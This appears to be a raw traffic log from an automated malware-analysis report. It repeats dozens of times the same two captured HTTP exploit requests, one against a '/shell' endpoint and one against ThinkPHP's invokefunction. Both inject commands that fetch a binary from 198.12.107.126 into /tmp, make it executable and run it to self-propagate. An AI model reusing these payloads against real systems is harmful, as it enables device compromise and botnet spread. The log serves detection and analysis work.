      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://198.12.107.126/YourName/BinName.x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/198.12.107.126/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
